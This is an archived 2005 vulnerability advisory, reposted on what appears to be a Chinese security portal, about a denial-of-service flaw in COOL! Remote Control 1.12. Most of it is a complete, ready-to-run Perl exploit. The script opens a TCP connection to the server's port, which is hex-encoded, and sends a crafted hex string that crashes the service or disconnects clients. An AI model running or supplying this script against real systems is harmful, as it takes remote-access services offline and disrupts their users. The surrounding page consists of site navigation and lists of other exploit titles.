首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
COOL! Remote Control DoS
来源:www.yaosoft.com 作者:Eric 发布时间:2005-09-14  

COOL! Remote Control DoS

Summary
"COOL! Remote Control is an excellent remote computing system that is very easy to use. It can display remote a PC screen on your own PC IN REAL TIME and allow you to use a mouse or keyboard work on it."

Lack of proper packet validation allows attackers to crash COOL! Remote Control and cause a DoS.

Credit:
The information has been provided by Eric Basher.
The original article can be found at: http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=90

Details
Vulnerable Systems:
* COOL! Remote Control 1.12

A denial of service condition has been disclosed in the COOL! Remote Control (server) component that could allow a remote attacker to crash the service by sending a malicious TCP packet on specific port.

Exploit:
#!usr/bin/perl
#
# COOL! Command Execution DOS Exploit
# --------------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.yaosoft.com
#
# * If Remote Control(Client application) is running then already connected to server,
# this command exploit will made Remote Control as Client disconnected from server machine.
# But if the Remote Control is not currently connected to Remote Server,then
# by send specified command to Remote Server its allow the server crashed/closed
#


$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 [host]\n";
print "Exam: $0 127.0.0.1\n";
print "\n";
exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$popy = "\x31\x31\x39\x38\x30";

print "\n[+] Connect to host..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($popy, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";

print "[+] Connected\n";
print "[+] Send invalid command..\n";

$empty = "\x49\x4e\x46\x41\x4d\x4f\x55\x531".
"\x47\x52\x4f\x55\x50";

send(SOCK, $empty, 0) or die "[-] Cannot send query: $!";
sleep(2);
print "[+] DONE\n";
print "[+] Check if server crash!\n";
close(SOCK);
exit;

#EoF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Snort <= 2.4.0 SACK TCP Opt
·Windows XP Firewall Bypassing
·Raxnet Cacti graph_image.php R
·Mercury Mail Multiple Buffer O
·GNU Mailutils imap4d search Co
·Zebedee DoS
·USB Lock Auto-Protect Locally
·Counter Strike 2D DoS
·ZipTorrent Local Information D
·VisualBoy Advanced Local Buffe
·Man2web CGI Command Execution
·BNBT EasyTracker DoS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved